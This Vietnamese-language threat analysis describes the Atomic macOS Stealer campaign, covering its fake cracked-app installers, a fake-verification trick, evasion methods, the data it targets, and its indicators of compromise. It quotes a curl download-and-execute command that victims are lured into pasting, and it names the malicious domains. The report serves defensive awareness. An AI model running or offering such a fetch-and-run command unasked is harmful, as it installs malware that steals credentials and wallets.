Bối cảnh an ninh mạng dành cho người dùng macOS đang đối mặt với những thách thức nghiêm trọng. Các tội phạm mạng ngày càng nhắm mục tiêu vào hệ sinh thái của Apple bằng các chiến dịch mã độc tinh vi. Atomic macOS Stealer (AMOS), một loại mã độc chuyên biệt để đánh cắp dữ liệu, đã nổi lên như một trong những mối đe dọa mạng đáng kể nhất đối với người dùng Mac.
Đặc biệt, mã độc này nhắm vào những người tìm kiếm các ứng dụng phần mềm crack. Trend Micro đã xác định và phân loại mối đe dọa này là Trojan.MacOS.Amos.PFH.
Sự Thay Đổi Trong Bảo Mật macOS
macOS từng được biết đến với danh tiếng là một hệ điều hành an toàn hơn so với Windows. Tuy nhiên, nhận thức này đang nhanh chóng thay đổi.
Sự phổ biến ngày càng tăng của các thiết bị Apple trong giới chuyên gia và những mục tiêu có giá trị cao đã khiến nền tảng này trở nên hấp dẫn hơn đối với tội phạm mạng.
AMOS đại diện cho một sự thay đổi mô hình trong các loại mã độc nhắm mục tiêu vào Mac. Người dùng Apple không còn có thể chỉ dựa vào danh tiếng bảo mật của hệ điều hành.
Phương Thức Lây Nhiễm của Atomic macOS Stealer
Chiến dịch AMOS sử dụng hai phương thức lây nhiễm chính. Cả hai đều được thiết kế để vượt qua các tính năng bảo mật của macOS thông qua kỹ thuật xã hội, thay vì các khai thác kỹ thuật trực tiếp.
Tải Xuống Ứng Dụng Crack Giả Mạo
Kẻ tấn công phát tán AMOS thông qua các ứng dụng crack giả mạo. Chúng đặc biệt nhắm vào người dùng tìm kiếm phần mềm phổ biến như CleanMyMac.
Khi nạn nhân nhấp vào “Download for MacOS” trên các trang web độc hại, họ sẽ nhận được tệp trình cài đặt .dmg. Các tệp này có số phiên bản ngẫu nhiên, ví dụ: “Installer_v.2.13.dmg” hoặc “Installer_v.7.26.dmg”.
Những tệp này ngụy trang thành trình cài đặt hợp pháp nhưng chứa payload độc hại. Tuy nhiên, công nghệ Gatekeeper của Apple đã chứng tỏ hiệu quả chống lại phương pháp phân phối này.
Trên các hệ thống chạy macOS Sequoia, các tệp .dmg không có chữ ký này bị chặn tự động. Hệ thống sẽ hiển thị cảnh báo rằng “Apple could not verify the installer is free of malware”. Đây là một thành công đáng kể của các biện pháp bảo mật tích hợp của Apple.
Kỹ Thuật Thực Thi Lệnh Terminal
Phương pháp phân phối thành công hơn của Atomic macOS Stealer là hướng dẫn người dùng thực thi các lệnh độc hại trực tiếp trong macOS Terminal.
Trong các trường hợp đã điều tra, người dùng bị ảnh hưởng đã truy cập trang web haxmac[.]cc nhiều lần trong tháng qua. Kỹ thuật này phản ánh phương pháp “fake CAPTCHA” được thấy trong các chiến dịch mã độc Windows.
Người dùng được cung cấp một bước xác minh giả mạo, yêu cầu họ sao chép và dán một lệnh như sau:
curl -sS -o /tmp/install.sh <URL> && chmod +x /tmp/install.sh && /tmp/install.shPhương pháp này cực kỳ hiệu quả vì nó hoàn toàn bỏ qua Gatekeeper. Người dùng tự nguyện thực thi mã độc, khai thác lòng tin và sự hợp pháp hóa nhận thức về các lệnh terminal.
Chiến Lược Né Tránh Phát Hiện của AMOS
Các nhà điều hành AMOS thể hiện sự hiểu biết tinh vi về các biện pháp phòng thủ an ninh mạng thông qua một số chiến lược né tránh.
Xoay Vòng Tên Miền (Domain Rotation)
Chiến dịch sử dụng các tên miền và URL tải xuống thay đổi liên tục. Chúng bao gồm các tên miền chuyển hướng như dtxxbz1jq070725p93.cfd và goipbp9080425d4.cfd.
Kỹ thuật này giúp né tránh các hệ thống phát hiện dựa trên URL tĩnh và làm phức tạp nỗ lực gỡ bỏ.
Phát Hiện Môi Trường Ảo Hóa (Environment Detection)
Mã độc bao gồm các tính năng chống phân tích, kiểm tra môi trường ảo hóa. Nó tìm kiếm các chỉ số như “QEMU”, “VMware” hoặc “KVM” trong hồ sơ hệ thống.
Nếu phát hiện môi trường ảo hóa, script sẽ thoát để tránh bị các nhà nghiên cứu bảo mật phân tích.
Lợi Dụng Tiện Ích Hệ Thống (Living-off-the-Land)
AMOS tận dụng mạnh mẽ các tiện ích macOS hợp pháp như `osascript`, `curl` và `AppleScript` để thực hiện các hoạt động độc hại. Điều này khiến việc phát hiện trở nên khó khăn hơn, vì đây là các thành phần hệ thống bình thường.
Lệnh `curl` đã được sử dụng để truy xuất tệp install.sh từ letrucvert[.]com. Trong một số trường hợp, nó được truy xuất từ goatramz[.]com.
Khả Năng Thu Thập Dữ Liệu của Atomic macOS Stealer
Một khi được cài đặt thành công, AMOS thể hiện khả năng thu thập dữ liệu sâu rộng. Điều này đặt ra các rủi ro nghiêm trọng về quyền riêng tư và bảo mật.
Dữ Liệu Trình Duyệt
Mã độc nhắm mục tiêu vào tất cả các trình duyệt lớn, bao gồm Chrome, Firefox, Safari, Edge, Opera, Brave và Vivaldi. Nó đánh cắp dữ liệu như mật khẩu đã lưu, cookie và lịch sử duyệt web.
Tài Sản Tiền Điện Tử
AMOS đặc biệt nhắm mục tiêu vào các ứng dụng ví tiền điện tử trên máy tính để bàn. Nó cố gắng đánh cắp dữ liệu các tệp ví và khóa riêng tư, có thể cung cấp quyền truy cập vào tài sản kỹ thuật số.
Thông Tin Hệ Thống
Mã độc thu thập các hồ sơ hệ thống chi tiết, tên người dùng, mật khẩu và dữ liệu Keychain. Điều này cung cấp cho kẻ tấn công thông tin toàn diện về hệ thống bị xâm nhập.
Tệp Cá Nhân
Kẻ trộm tìm kiếm và trích xuất các loại tệp khác nhau. Bao gồm tài liệu (.txt, .pdf, .docx), tệp ví và tệp cơ sở dữ liệu từ các vị trí phổ biến như Desktop, Documents và Downloads.
Ứng Dụng Nhắn Tin
AMOS nhắm mục tiêu vào dữ liệu Telegram và các nền tảng giao tiếp khác. Điều này có khả năng làm lộ các cuộc trò chuyện riêng tư và danh bạ.
Cơ Chế Duy Trì Quyền Truy Cập và Tẩu Tán Dữ Liệu
Atomic macOS Stealer thiết lập cơ chế duy trì quyền truy cập thông qua các phương pháp tinh vi. Điều này đảm bảo quyền truy cập liên tục ngay cả sau khi khởi động lại hệ thống.
Mã độc tạo các tệp ẩn với tên như “.helper” và “.agent” trong thư mục người dùng. Sau đó, nó cài đặt tệp cấu hình LaunchDaemon để đảm bảo thực thi tự động khi khởi động hệ thống.
Quá trình tẩu tán dữ liệu liên quan đến việc nén thông tin đã đánh cắp dữ liệu thành các kho lưu trữ ZIP. Sau đó chúng được truyền đến các máy chủ command-and-control thông qua yêu cầu HTTP POST.
Mã độc sử dụng các tiêu đề tùy chỉnh và các mã định danh được mã hóa. Mục đích là để xác thực quá trình truyền và theo dõi các hệ thống bị xâm nhập.
Chỉ Số Thỏa Hiệp (IoC)
Dưới đây là các Chỉ số Thỏa hiệp (Indicators of Compromise – IoC) liên quan đến chiến dịch Atomic macOS Stealer:
- Tên miền độc hại:
haxmac[.]ccdtxxbz1jq070725p93.cfdgoipbp9080425d4.cfdletrucvert[.]comgoatramz[.]com
- Phân loại mã độc: Trojan.MacOS.Amos.PFH
- Tệp độc hại ẩn:
.helper,.agent(trong thư mục người dùng) - Lệnh CLI độc hại mẫu:
curl -sS -o /tmp/install.sh <URL> && chmod +x /tmp/install.sh && /tmp/install.sh
Phát Hiện và Phòng Ngừa
Các giải pháp phát hiện và phản ứng điểm cuối hiện đại đã chứng tỏ hiệu quả trong việc xác định các nhiễm trùng AMOS thông qua phân tích hành vi.
Tính năng Workbench của Trend Vision One đã phát hiện thành công các chiến dịch thông qua các cảnh báo. Ví dụ: “Possible Credential Access from Web Browsers – MacOS” và “Input Capture via Password Prompt – MacOS”.
Các khả năng phát hiện này dựa trên việc tương quan các hoạt động đáng ngờ trên toàn chuỗi tấn công. Từ thực thi ban đầu đến tẩu tán dữ liệu, cung cấp cho các nhóm bảo mật khả năng hiển thị toàn diện vào quá trình xâm nhập.
Tầm Quan Trọng của Chiến Lược Phòng Thủ Đa Lớp
Chiến dịch AMOS đại diện cho một sự phát triển đáng kể trong mã độc nhắm mục tiêu vào Mac. Nó chứng minh rằng kỹ thuật xã hội vẫn hiệu quả hơn các khai thác kỹ thuật chống lại các hệ điều hành hiện đại.
Việc các tác nhân đe dọa nhanh chóng thích nghi từ phân phối dựa trên .dmg sang các lệnh terminal. Điều này xảy ra sau khi các biện pháp bảo vệ của macOS Sequoia được tăng cường, cho thấy tính chất động của cảnh quan mối đe dọa mạng.
Các chuyên gia bảo mật dự đoán sự phát triển liên tục trong các chiến thuật mã độc Mac. Điều này có thể bao gồm việc tăng cường sử dụng quảng cáo độc hại trên các nền tảng hợp pháp, tối ưu hóa công cụ tìm kiếm để quảng bá trình cài đặt giả mạo và lạm dụng tinh vi hơn các tệp nhị phân living-off-the-land.
Chiến dịch cũng nhấn mạnh tầm quan trọng của các chiến lược phòng thủ chuyên sâu. Các chiến lược này không chỉ dựa vào các biện pháp bảo vệ tích hợp của hệ điều hành. Trong khi Gatekeeper của Apple chặn thành công các cuộc tấn công dựa trên trình cài đặt truyền thống, phương pháp lệnh terminal đã chứng tỏ rất hiệu quả trong việc bỏ qua các biện pháp bảo vệ này. Để bảo vệ toàn diện, người dùng cần cảnh giác với các phương thức lây nhiễm kỹ thuật xã hội và luôn cập nhật kiến thức về bảo mật macOS. Nâng cao nhận thức về các kỹ thuật lừa đảo có thể giúp giảm thiểu rủi ro từ các mã độc như Atomic macOS Stealer.
